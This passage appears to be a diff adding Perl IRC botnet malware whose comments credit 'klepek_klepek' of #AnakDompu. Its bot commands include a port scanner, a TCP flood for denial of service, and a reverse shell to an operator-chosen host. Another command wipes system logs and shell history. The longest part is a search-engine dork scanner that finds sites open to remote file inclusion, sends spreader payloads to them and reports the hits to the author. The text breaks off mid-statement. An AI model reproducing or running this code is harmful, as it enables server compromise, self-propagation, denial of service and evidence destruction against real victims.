BOT : Server : 14Cannot View :14 1337"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uname -a : 7 $uname"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Uptime : 7 $uptime"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Prosses : 7 $processo"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] ID : 7 $id"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Own Dir : 7 $ownd"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] OS : 7 $distro"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Owner : 7 klepek_klepek Memang Cakep"); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1System]8,18,113,6[1Info] Channel : 7 #AnakDompu"); +} + +if ($funcarg =~ /^milw0rm/) { + my @ltt=(); + my @bug=(); + my $x; + my $page=""; + my $socke = IO::Socket::INET->new(PeerAddr=>"milw0rm.com",PeerPort=>"80",Proto=>"tcp") or return; + print $socke "GET http://milw0rm.com/rss.php HTTP/1.0\r\nHost: milw0rm.com\r\nAccept: */*\r\nUser-Agent: Mozilla/5.0\r\n\r\n"; + my @r = <$socke>; + $page="@r"; + close($socke); + while ($page =~ m/<title>(.*)</g){ + $x = $1; + if ($x =~ /\<\;/) { + $x =~ s/\<\;/</g; + } + if ($x !~ /milw0rm/) { + push (@bug,$x); + }} + while ($page =~ m/<link.*expl.*([0-9]...)</g) { + if ($1 !~ m/milw0rm.com|exploits|en/){ + push (@ltt,"http://www.milw0rm.com/exploits/$1 "); + }} + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]  Latest exploits :"); + foreach $x (0..(@ltt - 1)) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Milw0rm Bugs]14 $bug[$x] -3 $ltt[$x]"); + sleep 1; +}} +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Portscan # +###################### + +if ($funcarg =~ /^portscan (.*)/) { + my $hostip="$1"; + my + @portas=("15","19","98","20","21","22","23","25","37","39","42","43","49","53","63","69","79","80","101","106","107","109","110","111","113","115","117","119","135","137","139","143","174","194","389","389","427","443","444","445","464","488","512","513","514","520","540","546","548","565","609","631","636","694","749","750","767","774","783","808","902","988","993","994","995","1005","1025","1033","1066","1079","1080","1109","1433","1434","1512","2049","2105","2432","2583","3128","3306","4321","5000","5222","5223","5269","5555","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","7001","7741","8000","8018","8080","8200","10000","19150","27374","31310","33133","33733","55555"); + my (@aberta, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Scanning for open ports on  12".$1." started ."); + foreach my $porta (@portas) { + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => + 'tcp', Timeout => 4); + if ($scansock) { + push (@aberta, $porta); + $scansock->close; + } + } + + if (@aberta) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Port Yang Terbuka:5 @aberta"); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1PortScan] Tidak Ada Ports Yang Terbuka."); + } +} + +###################### +# End of Portscan # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Nmap # +###################### + if ($funcarg =~ /^nmap\s+(.*)\s+(\d+)\s+(\d+)/){ + my $hostip="$1"; + my $portstart = "$2"; + my $portend = "$3"; + my (@abertas, %porta_banner); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] :12 $1 11,10[1PoRt] 12 $2-$3"); + foreach my $porta ($portstart..$portend){ + my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => $portime); + if ($scansock) { + push (@abertas, $porta); + $scansock->close; + if ($xstats){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Founded 12 $porta"."/Open"); + } + } + } + if (@abertas) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] Complete "); + } else { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Nmap] No open ports have been founded 13"); + } + } +###################### +# End of Nmap # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +####################### +# Menghapus Log File # +####################### +if ($funcarg =~ /^hapuslog/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Poses Ini Sangat Lama Tunggu Beberapa Saat"); + system 'rm -rf /var/log/lastlog'; + system 'rm -rf /var/log/wtmp'; + system 'rm -rf /etc/wtmp'; + system 'rm -rf /var/run/utmp'; + system 'rm -rf /etc/utmp'; + system 'rm -rf /var/log'; + system 'rm -rf /var/logs'; + system 'rm -rf /var/adm'; + system 'rm -rf /var/apache/log'; + system 'rm -rf /var/apache/logs'; + system 'rm -rf /usr/local/apache/log'; + system 'rm -rf /usr/local/apache/logs'; + system 'rm -rf /root/.bash_history'; + system 'rm -rf /root/.ksh_history'; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Semua default log Dan File bash_history Akan Di Hapus"); + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Sekarang Menghapus Log File Di System"); + system 'find / -name *.bash_history -exec rm -rf {} \;'; + system 'find / -name *.bash_logout -exec rm -rf {} \;'; + system 'find / -name "log*" -exec rm -rf {} \;'; + system 'find / -name *.log -exec rm -rf {} \;'; + sleep 1; +sendraw($IRC_cur_socket, "PRIVMSG $printl :8,113,6[1MengHapusLogFile] Selesai Semua Logs TeLaH Di BeRsIhKaN"); + } +############################# +# Akhir Menghapus Log File # +############################# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# MAILER # +###################### +# For mailing use : +# !xan @sendmail <subject> <sender> <recipient> <message> +# +###################### +if ($funcarg =~ /^sendmail\s+(.*)\s+(.*)\s+(.*)\s+(.*)/) { +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Try Sending Mail to :10 $3"); +$subject = $1; +$sender = $2; +$recipient = $3; +@corpo = $4; +$mailtype = "content-type: text/html"; +$sendmail = '/usr/sbin/sendmail'; +open (SENDMAIL, "| $sendmail -t"); +print SENDMAIL "$mailtype\n"; +print SENDMAIL "Subject: $subject\n"; +print SENDMAIL "From: $sender\n"; +print SENDMAIL "To: $recipient\n\n"; +print SENDMAIL "@corpo\n\n"; +close (SENDMAIL); +sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mailer]8,1 Successfully Sended to :10 $recipient"); +} +###################### +# End of MAILER # +###################### +###################### +# Join And Part # +###################### + if ($funcarg =~ /^join (.*)/) { + sendraw($IRC_cur_socket, "JOIN ".$1); + } + if ($funcarg =~ /^part (.*)/) { + sendraw($IRC_cur_socket, "PART ".$1); + } + +###################### +#End of Join And Part# +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# TCPFlood # +###################### + +if ($funcarg =~ /^tcpflood\s+(.*)\s+(\d+)\s+(\d+)/) { + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1TCP DDoS]8,1 13,6[1HaJaR] 10 ".$1.":".$2." Untuk 10 ".$3." detik."); + my $itime = time; + my ($cur_time); + $cur_time = time - $itime; + while ($3>$cur_time){ + $cur_time = time - $itime; + &tcpflooder("$1","$2","$3"); +} +sendraw($IRC_cur_socket,"PRIVMSG $printl :0,113,6[1TCP DDoS] HaJar SeLeSai 10 ".$1.":".$2."."); +} +###################### +# End of TCPFlood # +###################### +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +###################### +# Back Connect # +###################### +if ($funcarg =~ /^back\s+(.*)\s+(\d+)/) { +my $host = "$1"; +my $porta = "$2"; +my $proto = getprotobyname('tcp'); +my $iaddr = inet_aton($host); +my $paddr = sockaddr_in($porta, $iaddr); +my $shell = "/bin/sh -i"; +if ($^O eq "MSWin32") { + $shell = "cmd.exe"; +} +socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!"; +connect(SOCKET, $paddr) or die "connect: $!"; +open(STDIN, ">&SOCKET"); +open(STDOUT, ">&SOCKET"); +open(STDERR, ">&SOCKET"); +system("$shell"); +close(STDIN); +close(STDOUT); +close(STDERR); +if ($estatisticas) +{ + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1BackConnect] Konek Ke 10 $host:$porta"); +} +} +###################### +#End of Back Connect# +################################################## +# Ketika Rasa Tak Dapat Di Ungkap Dengan KataЩ # +# www.AnakDompu.by.ru # +# Created By klepek_klepek # +# #AnakDompu # +# irc.dal.net # +################################################## +# EExPreSi SCANNER # +###################### +###################################################################### +#################### GOOGLE +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +### Start Message + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Memulai]8,18,113,6[1Scan]11,10[1Untuk]8,113,6[1Bug]13,1 $bug 9,1DaN10,1 $dork"); +### End of Start Message +# Starting The Search Engine + my @google=&googlet($dork); +# +push(my @tot, @google); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :13Vuln:9,1 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### AllTheWeb +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @alltheweb=&allthewebt($dork); + my @allweb=&standard($dork); +# +push(my @tot, @alltheweb, @allweb); +# +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]12,1 $dork"); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### LYCOS +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @lylist=&lycos($dork); +push(my @lybyp,@lylist); +# +push(my @tot, @lybyp); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### Yahoo +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ylist=&yahoo($dork); + my @yalist=&yahooa($dork); + my @yblist=&yahoob($dork); + my @yclist=&yahooc($dork); + my @ydlist=&yahood($dork); + push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist ); +# +push(my @tot, @yahoobypass); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### MSN +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @mlist=&msn($dork); +push(my @tot, @mlist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### SEARCH +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @slist=&search($dork); +push(my @tot, @slist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### FireBall +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @fireball=fireball($dork); +push(my @tot, @fireball); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +my $cinta="http://".$sito.$bug.$perawan."?"; +my $kasih=HTTP::Request->new(GET=>$cinta); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($kasih); +}} +elsif($re =~ /AnakDompu/) +{ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1ON] 13,6[1TaRgEt]7,1 $print"); +my $test2="http://".$sito.$bug.$idku."?"; +my $reqz=HTTP::Request->new(GET=>$test2); +my $ua=LWP::UserAgent->new(); +my $response=$ua->request($reqz); +}} +}}} +exit; +}} + +###################################################################### +#################### UOL +###################################################################### +if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){ +if (my $pid = fork) { +waitpid($pid, 0); +} else { +if (fork) { +exit; +} else { +my $bug=$1; +my $dork=$2; +my $contatore=0; +my %hosts; +# Starting The Search Engine + my @ulist=&uol($dork); +push(my @tot, @ulist); +my @puliti=&unici(@tot); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork "); +my $uni=scalar(@puliti); +foreach my $sito (@puliti) +{ +$contatore++; +if ($contatore %100==0){ +} +if ($contatore==$uni-1){ + sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork"); +} +### Print CMD and TEST CMD### +my $test="http://".$sito.$bug.$id."?"; +my $print="http://".$sito.$bug.$cmd."?"; +### End of Print CMD and TEST CMD### +my $req=HTTP::Request->new(GET=>$test); +my $ua=LWP::UserAgent->new(); +$ua->timeout(5); +my $response=$ua->request($req); +if ($response->is_success) { +my $re=$response->content; +if($re =~ /AnakDompu/ && $re =~ /uid=/){ +my $hs=geths($print); $hosts{$hs}++; +if($hosts{$hs}=="1"){ +$x=os($test); +($type,$space)=split(/\,/,$x); + sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print"); + sendraw($IRC_cur_socket, "PRIVMSG klepek_klepek :Uname:6 $type Vuln:10 $print"); +my $test2="http://".$sito.$bug.$spread."?"; +my 